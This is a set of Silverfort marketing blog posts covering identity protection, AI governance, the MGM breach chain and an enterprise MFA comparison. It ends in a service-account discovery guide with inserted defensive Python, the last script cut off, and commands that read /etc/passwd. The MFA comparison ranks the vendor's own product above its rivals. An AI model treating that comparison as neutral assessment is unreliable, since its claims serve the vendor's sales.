Silverfort has pioneered the first purpose-built Unified Identity Protection platform that can extend MFA to any user and resource; automate the discovery, monitoring, and protection of service accounts; and proactively prevent lateral movement and ransomware spread attacks. Silverfort connects to all domain controllers and other on-prem identity providers (IdPs) in the environment for continuous monitoring, risk analysis, and access policy enforcement on every authentication and access attempt made by users, admins, or service accounts.

By utilizing Silverfort's identity protection platform, utilities can better prepare themselves to comply with FERC cybersecurity rules in order to qualify for incentive-based rate treatment. Using Silverfort's rule-based and risk-based authentication and MFA capabilities can significantly improve utilities' cybersecurity posture by protecting them against an expanded threat landscape and ensuring they are cyber resilient.

Want to increase your resilience to identity threats and be aligned with FERC's Advanced Cybersecurity Investment program? Schedule a call with one of our experts.

---

- Published: 2023-09-25
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/why-ai-needs-good-governance/

Throughout my career, I’ve found that one principle remains true: Although technology constantly changes, the patterns that govern it remain steady. Over the last 30 years, I’ve seen huge shifts in technology: from mainframe computing to desktop computing to cloud computing, not to mention a host of new code-development approaches. Yet, despite these changes, I’ve found that governance patterns stay the same. Time and again I’ve seen people ignore those patterns, suggesting that the new way no longer needs the previous controls. And I’ve also seen these same people learn – often painfully – that indeed those patterns remained true and relevant.

Today, Artificial Intelligence (AI) is all the rage.
It is the hot new technology everyone’s talking about. The sheer hive-mind processing power of AI – its ability to interpret language and apply complex logic to find answers in just seconds – has immense potential. Yet it’s essential to remember that AI is still in its infancy. The technology is immature, untrained, and ungoverned. If it is to become a productive part of our society, it must be governed by the same principles that have governed all previous technology. So what are the time-tested patterns we need to apply to AI? Here are five:

### AI Access Rights Must Be Controlled and Limited

The proven principle of least privilege must be applied to AI engines and any software that incorporates them. I’ve been approached by vendors selling AI-powered technology who have asked for the keys to the kingdom — the ability to read and write to the most sensitive areas of my company. Organizations need to exercise great care when connecting to AI-enabled technologies.

### AI Is an Identity and Must Be Governed as Such

All proven patterns of onboarding, certification, recertification, and termination must apply to an AI identity. This means incorporating best practices around privileged access management, just-in-time access, and service account protection with the AI engine. Treat it like a person, and govern it like any other identity in your organization.

### AI Must Be Monitored

Comprehensive monitoring is a proven pattern to detect anomalous behavior, including identifying rogue or compromised insiders. AI should be no different. Like any entity, it is subject to misuse by bad actors and capable of being manipulated into breaking rules and acting outside of its original purpose. We must monitor AI for deviations and indicators of malicious activity (IoMA), and be able to respond accordingly — including disabling access and isolating threats.

### The Integrity, Accuracy, and Validity of AI Inputs and Outputs Must Be Checked and Limited by Validations and Rules

We’ve long proven the value of peer reviews, input and output validations in code, and other integrity-validation processes. These patterns must be applied to AI as well. We must peer-check the output, perhaps with alternative AI or human actors; we must govern what inputs can be given by defining rules around input and access; we must govern the output; and we must apply the principles of data loss prevention (DLP) and intellectual property protection (IPP) to any implementation of AI that could access our critical corporate data.

### AI Needs Lifecycle and Software Configuration Management

We must apply the proven principles of building test environments, rigorously validating and controlling change, and putting approval processes in place before allowing changes to AI systems. AI can change dynamically in production, so we should put guardrails in place. Production control is essential to prevent any unintended consequences of AI-powered software that was not well tested before implementation.

Certainly, there are more things to consider, but my rule of thumb is this: Treat AI like any other employee, identity, or system. Apply the same thinking and controls that you would for any of those. Don’t assume it to be infallible or all-knowing. Apply proven patterns to it, just as with previous technologies. In so doing you will keep your reputation, your customers, and the crown jewels of your company safe.

Interested in learning how Silverfort can help govern AI and protect identity? Reach out to one of our experts today.

---

- Published: 2023-09-21
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/mgm-breach-takeaway-on-prem-has-become-attackers-gateway-to-the-cloud/

Last week, the BlackCat ransomware group (also known as ALPHV) attacked the operations of MGM Resorts and forced them to shut down their IT systems.
What sets this attack apart from more traditional ransomware attacks is that at a certain point the attackers were able to leverage their domain dominance of the on-prem environment to compromise the cloud identity infrastructure, harvesting cleartext passwords of Okta users. The attack now joins others – including those against Okta, Uber, and Cisco – in marking a new pattern that exploits the interconnectivity of the on-prem and SaaS environments to compromise the SaaS through the on-prem. This introduces a significant risk for all organizations today that have a hybrid environment (i.e., employing both an on-prem and a cloud directory) and emphasizes the need for a unified identity protection approach.

### MGM Breach: Walking Through the Attack’s Stages

From publicly available data we can construct the following flow:

1. Attackers got information on LinkedIn about an employee, called the help desk, and used social engineering to get access to the network.
2. Following that, they performed lateral movement until they gained access to a domain controller (details on the exact techniques used in this stage remain unclear) and stole user passwords stored there.
3. At this point, the attackers asked for the ransom and, when it was refused, subsequently installed ransomware on MGM’s ESXi servers, then persisted in their lateral movement until gaining access to the Okta server.
4. Once there, the attackers exfiltrated cleartext passwords from servers, which then gave them the ability to log into Okta and access any of the SaaS apps it manages.

### On-Prem Domain Dominance Used as a Stepping Stone to the SaaS Environment

What's interesting about this attack is that while the hackers had access to Active Directory (AD) hashes, they did not have access to the passwords. The attackers used AD to pivot to Okta and managed to steal plaintext passwords. Essentially, Active Directory served as a gateway to Okta. This highlights the need for organizations to identify and address any weaknesses and misconfigurations in their identity infrastructure. Many organizations connect Active Directory to Okta but often overlook securing this connection, which in this case provided the attackers with an opportunity to exploit the weakness.

### The Critical Gap of Hybrid Identity Infrastructure: Connected but Not Protected

This breach highlights an inherent weakness that is all too commonly ignored – the fragmented and siloed nature of the identity infrastructure in the hybrid environment. Let’s now dive into this in more detail.

Most organizations manage their on-prem users in Active Directory. In parallel, they manage the same users in a cloud directory or a federation server (e.g., Entra ID, Okta, Ping, etc.). To enable users to have a seamless login experience, these two different identity providers are synced – meaning that the same username and password combination is used to access both the on-prem and the SaaS resources. Additionally, the directory used for the SaaS apps often has some footprint in the on-prem environment (for example, the Okta server in the case of this breach). This connection implies that if an attacker has successfully compromised user credentials in the on-prem environment, they can then use them to directly log in to SaaS apps as well as move laterally and compromise the cloud identity infrastructure components in the on-prem environment.

### The On-Prem’s Exposure to Identity Threats Makes It the Ultimate Attack Vector to Compromise SaaS

The recent white paper published by Osterman Research, “The State of the Identity Attack Surface: Insights into Critical Security Gaps,” clearly shows that the on-prem environment is critically vulnerable to the use of compromised credentials for malicious access. As the report details, traditional multi-factor authentication (MFA) and Privileged Access Management (PAM) solutions fail to provide sufficient real-time protection against identity threats for the vast majority of organizations. Threat actors are painfully aware of these blind spots and leverage them in performing lateral movement within the on-prem environment, encountering little to no resistance. And lateral movement is the X factor that turns a local event (such as a single compromised machine) into an enterprise-level incident, as the MGM breach illustrates.

### Conclusion: Identity Protection for On-Prem Equals Identity Protection for the Cloud

Any chain is only as strong as its weakest link. And the hybrid environment is a chain where the on-prem and cloud are closely interwoven. Thus, strengthening the on-prem environment means strengthening the whole chain. Regardless of how far you’ve come in your cloud migration, if you still have an on-prem portion, this is a serious exposure you need to address. But how exactly can organizations address this gap? After all, even before there was a cloud, there was no security solution that could mitigate the risk of lateral movement and prevent it in real time.

### Silverfort Unified Identity Protection Platform: Blocking Lateral Movement in Real Time

Silverfort has pioneered the first Unified Identity Protection platform that’s purpose-built to prevent identity threats in real time across any user, system, and environment. Silverfort integrates with the on-prem and cloud identity infrastructure to provide continuous monitoring, risk analysis, and controls such as MFA or access blocking on every authentication and access attempt. In this way, Silverfort can bring identity protection to resources that could never have been protected before. An example is access to workstations and servers over the command line via tools such as PsExec or Remote PowerShell. This type of access is the default way attackers perform lateral movement and is beyond the coverage of traditional MFA solutions. Silverfort is the first solution able to require MFA to detect and block malicious access of this type.

### How Silverfort Could Have Prevented an MGM-Like Attack Scenario

As previously stated, it’s unclear exactly how the attackers performed the lateral movement attack in the network. But it is likely that Silverfort could have prevented this breach in two ways:

- Silverfort would likely have detected the lateral movement to Active Directory, stopping the attackers before they could compromise it.
- Alternatively, Silverfort would likely have detected the attackers moving from AD to Okta, thus preventing the compromise of the Okta server.

The diagram below illustrates how Silverfort’s protection would have stopped the attack in its early stages:

Does your organization have a hybrid environment? Find out more about how Silverfort can help reduce your risk. Schedule a call with one of our experts.

---

- Published: 2023-09-12
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/the-voice-of-the-identity-practitioners-is-clear-identity-protection-is-broken/

As an identity security practitioner, it is not news to you that the identity attack surface is exposed. You already know that despite all your MFA and PAM efforts, adversaries can still access your resources, facing little to zero resistance. And there’s no one more qualified to know that than yourself – after all, you’re the one who’s accountable for the deployment and operation of these solutions. But have these insights really made their way into the minds of the decision-makers in your organization? This new report by Osterman, ‘The State of the Identity Attack Surface: Insights into Critical Security Gaps’, brings your voice to the forefront for the first time. You now have the numbers to back up your concerns.
To gain insights into the actual security posture of the identity attack surface, Osterman Research surveyed close to 650 security practitioners such as Identity Architects, Identity Infrastructure Managers, and Identity Management Managers. Here are some highlights that emerged from the survey that should not be surprising to you:

- Only 10.7% of organizations manage to get their PAM solutions fully onboarded and working.
- Only 6.7% of organizations manage to implement MFA on all their critical resources.
- Only 5.7% of organizations have full visibility into their service accounts.

This report focused on the three aspects that build up the resilience of your environment to the malicious use of compromised credentials: MFA, PAM, and service accounts. Let’s understand why these were chosen.

### MFA: The Tested and Proven Method to Prevent Malicious Access

It is well known that MFA significantly decreases the likelihood of a credential compromise being a successful attack. In spite of this, it is important to consider how and where MFA is used. By failing to protect the full scope of users and resources under attack, MFA's promise of enhanced security is diminished, since attackers can still access resources without having to be authenticated. Based on this approach, it is assumed that partial MFA deployment is not sufficient to protect the entire identity attack surface.

### PAM: Purpose-Built Protection for Admin Accounts

Implementing PAM solutions is an ongoing challenge where you can't see the light at the end of the tunnel. It is mainly due to its long and complex deployment process that PAM programs often extend over months and even years, and in many cases they do not reach their full potential. There are a number of reasons for this, such as complexity, including the low-to-partial visibility identity teams have into privileged accounts in their environment, especially machine-to-machine service accounts. While most organizations are investing in PAM, few are fully deployed with all privileged accounts onboarded and protected.

### Service Accounts: Adversaries’ Target of Choice

The ability to identify what service accounts exist is fundamental to the implementation of security controls. In order to avoid misuse of service accounts, visibility allows subsequent security controls to be implemented, and it is the responsibility of the organization to ensure they are achieving the desired protections. Only 32.1% of our survey respondents believed they have a high level of visibility, but not close to full visibility, into their service accounts. Service accounts can be compromised just like any other user account within the environment. Unmonitored, highly privileged, and unprotected by MFA and PAM, they are the ideal compromise target for lateral movement and ransomware spread.

### Assess Your Environment's Resilience and Take Action Accordingly

Read this report, not only to learn what your peers are struggling with but to benchmark your environment against the standard. Until now it was only you and your team who knew the harsh truth. We hope this report will be the first step in making it common knowledge - the first step towards fixing it.

Read the full report

---

- Published: 2023-09-11
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/identity-protection-cant-be-taken-for-granted-anymore/

The findings in the report challenge the implicit trust that the purchase and deployment of an identity security solution equals protection.

Would you be surprised to learn that only 10% of organizations manage to get their PAM solution fully onboarded? That less than 7% manage to get MFA protection for the majority of their critical resources? That only 20% of identity security teams are confident in their ability to use these solutions to prevent malicious access with compromised credentials?

A new report by Osterman Research, named ‘The State of the Identity Attack Surface: Insights into Critical Security Gaps’, reveals that the actual coverage of identity security solutions and practices is materially lower than most people think. A global survey among hands-on identity security practitioners shows that high exposure to account takeover, lateral movement, and ransomware spread is the norm rather than an outlier. In plain words: adversaries with compromised credentials encounter low to zero defenses when accessing targeted resources.

### The Protection of Identity Security Controls Such as PAM and MFA Can’t Be Taken for Granted

The findings in the report challenge the implicit trust that the purchase and deployment of an identity security solution equals protection. It is for you to take to your CISO and ask: ‘How do we stack up against what this report claims as the standard?’ Maybe your organization is one of the few that have all identity protection lined up. But maybe there’s a gap in your MFA, PAM, or service account protection. You’d want to discover and resolve it before adversaries do.

### Critical Gap: Real-Time Protection Against the Malicious Use of Compromised Credentials

The report goes over all the parameters that build up an organization’s ability to have real-time protection against identity threats, such as the scope of covered resources and protected users. From the executive perspective, the importance of the report is its ability to provide you with the right questions to surface any existing gaps in your organization’s identity security posture. For example, the right question is not ‘Do we have MFA?’ but rather ‘Does our MFA protection apply to all our critical resources and users?’ Not ‘Do we have PAM?’ but ‘Is our PAM solution fully onboarded, or did we give up and settle for partial protection only?’

### Asking the Hard Questions Is the Beginning of the Solution

As an executive, you operate under the assumption that the people who are directly accountable for the cybersecurity of your organization are prioritizing the purchase and deployment of the right solutions. This is their expertise, and you rightfully trust their judgement. However, as a business leader, you also know that people who are in the trenches of day-to-day work can often miss critical changes as they happen. Your security stakeholders are not ideally placed to zoom out of their 24/7 hand-to-hand fights with the surrounding cyber threats. But someone needs to ask the tough questions that can’t take anything for granted just because this is the way things were always done.

Click here to download the report and gain insight into the identity protection questions you need answers to.

---

- Published: 2023-09-11
- Modified: 2024-07-10
- URL: https://www.silverfort.com/blog/enterprise-mfa-solutions/

With an increasing number of data breaches and cyber attacks reported daily, multi-factor authentication has become essential for any organization looking to strengthen its security posture. However, choosing an enterprise-grade MFA solution is no easy task. There are many options available, each with different capabilities, compatibility requirements, and price points. This article provides an in-depth review and comparison of the leading enterprise MFA solutions on the market today. We evaluate key factors such as the range of authentication methods supported, integration with existing infrastructure and applications, reporting and analytics features, and total cost of ownership.

### The Evolution of Enterprise Authentication

Enterprise authentication has progressed rapidly over the past decade. As cyber threats have evolved, so too have the methods companies use to verify users and control access. Initially, single-factor authentication (SFA) utilizing usernames and passwords was standard.
However, the rise of data breaches and credential stuffing attacks rendered this approach obsolete. Static passwords fail to provide adequate protection, as they can easily be guessed, stolen, or cracked. In response, two-factor authentication (2FA) was introduced. 2FA adds an additional layer of security, requiring not only a password but also a one-time code sent via SMS text message or generated by a hardware token. While 2FA mitigates some risks, SMS-based 2FA remains vulnerable to SIM swapping and man-in-the-middle attacks. To address these concerns, enterprises have adopted multi-factor authentication (MFA) and modern authentication methods like push notifications, biometrics, FIDO2 security keys, and risk-based access. MFA combines two or more independent credentials for login, like a password, SMS code, and fingerprint. However, not all MFA solutions are equal. The optimal approach uses a passwordless method, employs machine learning for adaptive risk analysis, provides a frictionless user experience (ideally agentless), and offers robust security and scalability for organizations.

Evaluating the Top Enterprise MFA Solutions

To determine the best enterprise MFA option, one must evaluate the major players in the market. Some of the prominent solutions are:

1. Silverfort

Silverfort is an innovative leader in the enterprise MFA solutions market. Our agentless technology utilizes both rule-based and risk-based policies to provide adaptive access control. Unlike other MFA solutions, Silverfort’s technology enables it to extend MFA protection to authentication protocols that don’t natively support MFA, such as NTLM and Kerberos. In that manner, a critical portion of the organization’s authentications that was formerly exposed is now secured. Silverfort continuously analyzes the activity of all users, creating a unique behavioral baseline profile for each. By understanding a user’s typical behavior and environment, Silverfort can detect anomalies that may indicate account compromise or credential misuse. Our solution then adapts authentication requirements accordingly, prompting for additional verification only when truly necessary. This results in a frictionless experience for legitimate users while still preventing unauthorized access. For organizations dealing with sensitive data or compliance requirements, Silverfort offers a compelling and robust MFA platform. With its risk-based approach and extended resource coverage, Silverfort is redefining secure access for the enterprise.

2. Okta Adaptive MFA

Okta Adaptive MFA stands as a versatile player in the enterprise MFA landscape, offering a range of authentication factors and integrations. Its strength lies in its adaptability, with the system tailoring authentication requirements based on user behavior, location, and device context. However, while Okta provides a strong set of features, it falls short in extending MFA protection to legacy protocols like NTLM and Kerberos, an area where Silverfort excels. Additionally, Okta’s reliance on agents for some integrations can add to the administrative overhead, contrasting with Silverfort’s streamlined, agentless approach.

3. JumpCloud Protect

JumpCloud Protect is a relatively new entrant in the MFA market, offering a user-friendly interface and basic MFA functionalities suitable for small to medium-sized enterprises. While it supports common protocols and integrates well with its directory services, JumpCloud's capabilities in handling complex, large-scale environments are limited. Unlike Silverfort, which provides comprehensive coverage including legacy protocols and agentless deployment, JumpCloud's scope remains more suited for less complex IT infrastructures.

4. Thales SafeNet

Thales SafeNet, a well-established name in digital security, offers a robust MFA solution focusing on hardware tokens and mobile-based authentication. While its hardware-based security keys provide a high level of security, they may not be as convenient or scalable for large organizations compared to the more flexible, adaptive methods used by other solutions. Additionally, SafeNet’s approach can be less user-friendly and more costly, especially for enterprises looking to secure a wide range of resources and protocols.

5. Duo Security MFA

Duo Security, now part of Cisco, is known for its ease of use and straightforward implementation. Its push-based authentication and broad third-party integrations make it a popular choice. However, Duo’s approach, while user-friendly, doesn’t offer the same level of behavioral analytics and adaptive controls found in other solutions. This lack of contextual and risk-based authentication could be a limiting factor for enterprises seeking a more dynamic and proactive security stance.

6. Microsoft Azure AD

Microsoft Azure AD, integrated within the extensive Microsoft ecosystem, offers convenient MFA solutions, particularly for organizations heavily invested in Microsoft products. Its integration with Office 365 and other Microsoft services is seamless. However, its capabilities are more standardized and less flexible when compared to Silverfort’s adaptive, risk-based authentication, which can adjust in real time to emerging threats and unusual user behaviors.

7. Ping Identity MFA

Ping Identity offers a strong identity management platform with added MFA capabilities. Its focus is on seamless integration with existing enterprise infrastructures. While it offers solid MFA features, Ping Identity’s approach is more traditional, lacking the innovative, agentless technology and extensive coverage of legacy and modern protocols of other platforms. For enterprises requiring a more advanced, holistic security approach, Silverfort’s solution may be more appealing.

8. RSA SecurID

RSA SecurID, one of the pioneers in the MFA space, is known for its token-based authentication system. While RSA has expanded its offerings to include mobile-based authentication, its approach remains somewhat traditional compared to newer, more adaptive solutions like Silverfort. RSA’s strength lies in its established reputation and reliability, but it may not meet the needs of organizations looking for cutting-edge, behavioral analytics-driven security solutions.

Key Benefits of Silverfort's Agentless MFA Approach

Silverfort’s agentless MFA solution provides several key benefits for enterprise security.

Cost Efficiency

Silverfort’s agentless approach eliminates the time and money spent deploying and managing authentication agents on users’ devices. By plugging into the existing identity infrastructure, Silverfort deploys seamlessly without disrupting day-to-day operations or requiring specialist resources. This streamlined integration reduces total cost of ownership and speeds time to value.

Optimized User Experience

Silverfort provides transparent multi-factor authentication, meaning users are authenticated automatically in the background without interrupting their workflow. Users simply access applications and systems as usual while Silverfort verifies their identity invisibly using machine learning and behavioral analytics. This invisible, zero-friction experience encourages user adoption and mitigates potential loss of productivity.

Real-time Risk Analysis

Silverfort leverages advanced AI and machine learning to build a risk profile for each user based on their typical behavior and access patterns. By analyzing over 100 risk attributes in real time, the platform can detect anomalies and risky sign-in attempts, prompting step-up authentication only when necessary.
This context-aware approach reduces friction for low-risk access and ensures high-risk access is verified, balancing security and usability.

Comprehensive Coverage

As an agentless solution, Silverfort provides MFA for all on-prem and cloud resources, as well as all available access methods. This includes command line access, legacy apps, IT infrastructure, VPN, VDI, web apps, servers and more. Silverfort acts as an overlay, enhancing existing security controls with risk-based authentication and closing any gaps in MFA coverage across the organization. This comprehensive approach helps reduce risk exposure and ensures a consistent user experience regardless of access method.

Silverfort’s agentless MFA platform offers innovative, comprehensive protection with an optimized user experience and lower total cost of ownership. By making multi-factor authentication invisible through real-time risk analysis and seamless integration, Silverfort provides the best of both security and productivity. With its sophisticated machine learning and broad coverage, Silverfort is redefining secure access for the enterprise.

The Future of Access Management Powered by Silverfort

Silverfort is pioneering a new generation of access management solutions built for today’s borderless networks and hybrid cloud environments. Their innovative platform leverages device trust and risk signals to enable frictionless access while reducing vulnerabilities.

Unifying Access Control

Silverfort converges multiple access technologies into a single, unified policy engine. This includes passwordless authentication methods like FIDO2, push notification-based access, and traditional passwords and OTPs. Policies can be defined based on user attributes, device trust levels, locations, and more. By consolidating access management into a single solution, organizations benefit from increased visibility, simplified administration, and consistent security enforcement across all resources.

Continuous Risk Assessment

Silverfort employs machine learning to continuously assess device risk and trust levels. The platform analyzes over 100 attributes including patching levels, configuration issues, compromised credentials, and indicators of compromise. This real-time device risk scoring enables adaptive authentication and granular policy enforcement. Users on trusted devices may experience passwordless access while higher-risk devices prompt for additional authentication challenges. This data-driven approach reduces friction for low-risk access and tightens security for potential threats.

Simplified Deployment and Administration

The Silverfort platform is designed for rapid deployment across complex environments. It integrates easily with existing infrastructure and can be deployed on-premises or in the cloud. An intuitive, web-based admin console provides a centralized location for managing all access policies, users, and reporting. Role-based access control enables distributed policy administration while still maintaining oversight.

Silverfort is poised to dominate the next generation of access management. As networks become more distributed and identities more ephemeral, real-time risk scoring and adaptive authentication are critical. By unifying multiple access technologies into a single, intelligent platform, Silverfort is delivering on the promise of secure access everywhere. Organizations looking to simplify administration, improve visibility, and strengthen security for hybrid environments would be wise to consider Silverfort as their access management solution of the future.

Conclusion

For enterprises seeking to implement an MFA solution to enhance their security posture, Silverfort is an industry leader that provides comprehensive and customizable options. Our cutting-edge technology offers adaptive authentication and risk-based access control to protect corporate data and resources. With a focus on balancing security and user experience, Silverfort delivers an innovative solution built for the modern digital workspace. For organizations looking to redefine secure access in today's cloud-first world, Silverfort is the clear choice.

---

- Published: 2023-09-11
- Modified: 2024-07-10
- URL: https://www.silverfort.com/blog/finding-service-accounts-on-servers/

Service accounts are often overlooked users on servers and workstations that can pose serious risks if not properly managed and secured. As organizations focus on strengthening human user account security, service accounts are frequently left unmonitored. This leaves broad access and privileges in place that can be compromised by malicious actors. Monitoring service accounts and understanding their permissions is crucial to establishing a strong security posture.

This article provides a comprehensive guide to identifying service accounts across an environment. It outlines common account types, locations, and discovery methods to build a full inventory of service accounts. It also highlights how a dedicated solution like Silverfort can automate the discovery, access control and protection of all service accounts in the environment, providing organizations with granular visibility into every non-human identity and machine-to-machine authentication, as well as its sources, destinations, authentication protocols, and activity volume. By gaining visibility and control over service accounts, organizations can close a critical security gap and strengthen their overall identity and access management programs.

What Are Service Accounts?

Service accounts are machine-to-machine user accounts used by applications and services to access resources and perform automated tasks. Often service accounts have elevated privileges, which makes them prime targets for attackers. To properly secure service accounts, organizations first need to locate them on their servers. The most effective way to locate service accounts at scale is to use a solution like Silverfort that can automatically discover domain user accounts, determine which ones are service accounts, monitor them for anomalies, and protect them from identity-based attacks. By gaining comprehensive visibility into service accounts, organizations can harden security and simplify compliance.

Why You Need to Find Service Accounts

Service accounts are a necessity for many server operations, but they also pose security risks if not properly managed. To strengthen security and compliance, organizations need to discover and monitor all service accounts on their servers. Service accounts are operating system accounts used by applications, services or scripts to interact with the system. They allow automated processes to run without human intervention. However, because service accounts often have privileged access, they are attractive targets for attackers. If compromised, they can be used to gain full control of servers and access sensitive data.

Common Types of Service Accounts

Service accounts are a type of user account created specifically for non-human access to IT systems and services. They are commonly used by applications, scripts, and automation tools to access resources and perform actions. There are several common types of service accounts found on servers:

Local Service Accounts

Local service accounts run system services on individual devices. They are created and managed locally and not shared across systems.

Network Service Accounts

Network service accounts provide a consistent identity for services to access resources across networks. They have a broader scope than local service accounts and can be used by multiple systems within a network.

Managed Service Accounts (MSAs)

Managed service accounts are Active Directory accounts that automate password management, simplify administration, and improve security.
They're tied to a service, not an individual administrator, and can be used by multiple systems in a domain.

Hybrid Service Accounts

Hybrid service accounts are designed to operate across both on-premises and cloud environments. These accounts bridge the gap between traditional network boundaries and cloud-based resources, making them essential in modern, hybrid IT infrastructures. They often require careful configuration to ensure secure and seamless access across different platforms. Hybrid service accounts are particularly relevant for organizations transitioning to the cloud or operating in a mixed environment, where they need to interact with both local data centers and cloud services like AWS, Azure, or Google Cloud.

Scanners

Scanner service accounts are used by automated tools that perform network or security scans. These accounts require specific permissions to scan systems, networks, and applications for vulnerabilities or compliance checks. Unlike traditional service accounts, scanner accounts often have elevated privileges to access various network segments and systems, making them a critical component of cybersecurity strategies. However, due to their elevated access, they must be tightly controlled and monitored to prevent misuse or exploitation.

Locating Service Accounts in Windows

Locating service accounts on Windows servers requires investigating several areas of the system. Service accounts are non-interactive user accounts used by Windows services and applications to access resources.

To find service accounts on Windows servers, start by examining the Services console. This contains a list of all installed services, including the accounts they use. Look for accounts with names like “Local Service,” “Network Service,” or “Service Account.” Note that some services use the SYSTEM account, which has full control of the system.

Next, check for scheduled tasks by going to Task Scheduler > Task Scheduler Library. Here you’ll find tasks that automatically run on a schedule, and the accounts used to run them. Look for any tasks running under privileged service accounts.

Then review the Event Viewer, which logs events from Windows services and applications. Go to Windows Logs > Security and look for events with a Logon Type of “Service.” The Account Name field will show the service account used. This can uncover service accounts not listed in the Services console or Task Scheduler.

It’s also important to check for service accounts in the registry. Go to HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Service Profiles and look for subkeys named after service accounts. These contain runtime configurations for services using those accounts.

Finally, use a tool like the Sysinternals Autoruns utility to scan for Windows Autostart locations. This finds program shortcuts, registry entries, and file system locations where applications run at startup. Review the entries to see if any services are configured to start automatically using privileged service accounts.

By thoroughly investigating these areas of a Windows server, organizations can locate hidden service accounts and ensure they are properly secured and monitored. Using a solution like Silverfort’s agentless platform is the best way to automatically discover, assess and protect all service accounts across an environment.

Locating Service Accounts in Linux

Locating service accounts on Linux servers requires careful detection methods. These privileged accounts are often hidden or disguised to avoid detection, so standard user account discovery techniques may miss them. To uncover service accounts on Linux systems, security professionals should:

Check for accounts with UID below 1000

On Linux, UID values below 1000 are typically reserved for system accounts. Any accounts with a UID under 1000 should be investigated to determine if they are service accounts. These may include accounts like “nobody,” “dbus,” or “apache.”
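The Event Viewer step above scales poorly when done by hand, so here is an added example (not Silverfort's code, not from the original post) that does the same review over an exported Security log. It assumes the events were exported as XML, for instance with `wevtutil qe Security /q:"*[System[EventID=4624]]" /f:xml`, and wrapped in a single root element so they parse as one document; it also relies on the fact that the “Service” logon type shown in Event Viewer is LogonType 5 in the 4624 event data. It goes one step beyond the text by also collecting LogonType 4 (Batch), which is what scheduled tasks produce, so the Task Scheduler step is covered by the same pass. The sample events are constructed.

```python
"""Extract service and scheduled-task accounts from exported Windows Security
events. Added example with a constructed sample; not Silverfort code."""
import xml.etree.ElementTree as ET
from collections import defaultdict

# Namespace used by Windows event XML.
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# 4624 LogonType values that indicate non-interactive use:
# 5 = Service (started by the Service Control Manager), 4 = Batch (scheduled task).
NON_INTERACTIVE = {"5": "Service", "4": "Batch (scheduled task)"}

# Constructed sample shaped like `wevtutil qe Security /f:xml` output; only the
# fields this script reads are included, and the events are wrapped in <Events>.
_EVENT = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>{eid}</EventID><Computer>{host}</Computer></System>
 <EventData>
  <Data Name="TargetUserName">{user}</Data>
  <Data Name="TargetDomainName">{domain}</Data>
  <Data Name="LogonType">{ltype}</Data>
 </EventData>
</Event>"""

_SAMPLE_ROWS = [  # (event id, computer, domain, user, logon type); hostnames are made up
    (4624, "FILESRV01.corp.example", "CORP", "svc-backup", 5),
    (4624, "FILESRV01.corp.example", "CORP", "svc-backup", 5),
    (4624, "APPSRV02.corp.example", "CORP", "svc-etl", 4),
    (4624, "APPSRV02.corp.example", "NT AUTHORITY", "NETWORK SERVICE", 5),
    (4624, "WKS-117.corp.example", "CORP", "jdoe", 2),         # interactive: ignored
    (4634, "FILESRV01.corp.example", "CORP", "svc-backup", 5),  # logoff event: ignored
]
SAMPLE_EVENTS = "<Events>\n" + "\n".join(
    _EVENT.format(eid=e, host=h, domain=d, user=u, ltype=t) for e, h, d, u, t in _SAMPLE_ROWS
) + "\n</Events>"


def iter_events(xml_text):
    """Yield (event_id, computer, event_data dict) for every <Event> in the export."""
    root = ET.fromstring(xml_text)
    for ev in root.findall("e:Event", NS):
        event_id = ev.findtext("e:System/e:EventID", namespaces=NS)
        computer = ev.findtext("e:System/e:Computer", default="", namespaces=NS)
        data = {d.get("Name"): (d.text or "") for d in ev.findall("e:EventData/e:Data", NS)}
        yield event_id, computer, data


def find_service_logons(xml_text):
    """Map DOMAIN\\user -> {'kinds', 'hosts', 'count'} for successful logons
    (event 4624) whose LogonType is Service (5) or Batch (4)."""
    found = defaultdict(lambda: {"kinds": set(), "hosts": set(), "count": 0})
    for event_id, computer, data in iter_events(xml_text):
        kind = NON_INTERACTIVE.get(data.get("LogonType"))
        if event_id != "4624" or kind is None:
            continue
        account = f"{data.get('TargetDomainName', '')}\\{data.get('TargetUserName', '')}"
        entry = found[account]
        entry["kinds"].add(kind)
        entry["hosts"].add(computer)
        entry["count"] += 1
    return dict(found)


if __name__ == "__main__":
    for account, info in sorted(find_service_logons(SAMPLE_EVENTS).items()):
        print(f"{account:32} {info['count']:3} logon(s)  "
              f"{', '.join(sorted(info['kinds']))}  on {', '.join(sorted(info['hosts']))}")
```

Run against a real export, the output is the list of accounts that actually started services or tasks on the host during the log's retention window, which is exactly the set the Services console and Task Scheduler views can miss (services that were since removed, or tasks registered by other tools); anything that appears here but not in your inventory is a candidate for the review described above.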
Analyze account naming conventions

Service accounts frequently follow standard naming conventions, like “svc-,” “service-,” or “daemon-.” Accounts following these patterns may be service accounts and should be verified. Some common examples are “svc-admin,” “service-app,” or “daemon-data.”

Review account login shells

Service accounts typically have restricted login shells, like “/sbin/nologin” or “/bin/false.” Any account with one of these as the login shell is likely a service account. This can be checked by running `grep -E '(/sbin/nologin|/bin/false)$' /etc/passwd` or a similar command.

Check account home directories

Service accounts often have home directories set to “/dev/null” or “/.” If an account has one of these as the home directory, it is probably a service account. This can be detected by matching the home directory field exactly, for example `awk -F: '$6 == "/dev/null" || $6 == "/"' /etc/passwd`. Note that a plain `grep '/' /etc/passwd` is not a useful check, because every entry contains a slash in its home or shell field.

Monitor account login events

Because service accounts are typically non-interactive accounts, there should be no login events for these accounts. Any account without login events over a period of time is potentially a service account. This can be checked by analyzing the /var/log/secure or /var/log/auth.log login logs.

Using these detection methods, security teams can uncover hidden and disguised service accounts on Linux systems. With a solution like Silverfort, these accounts can then be monitored and protected to help close security gaps and reduce risks.

Locating Service Accounts in Active Directory

Discovering service accounts in Active Directory can be a challenging task that requires a meticulous approach. These accounts often remain hidden or camouflaged to avoid detection, making it crucial to employ effective techniques specifically designed for their discovery.
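The four /etc/passwd checks above are easiest to apply together, so that an account which passes one check but fails another still surfaces. The following is an added example (not Silverfort's code) that parses passwd-format input and reports which heuristics fire for each account; the sample passwd content is constructed, and the extra home directory “/nonexistent” and the `/usr/...` shell variants are assumptions about common distribution defaults, not something the text states.

```python
"""Flag likely service accounts in /etc/passwd using the heuristics above.
Added example with a constructed passwd sample; not Silverfort code."""
import re

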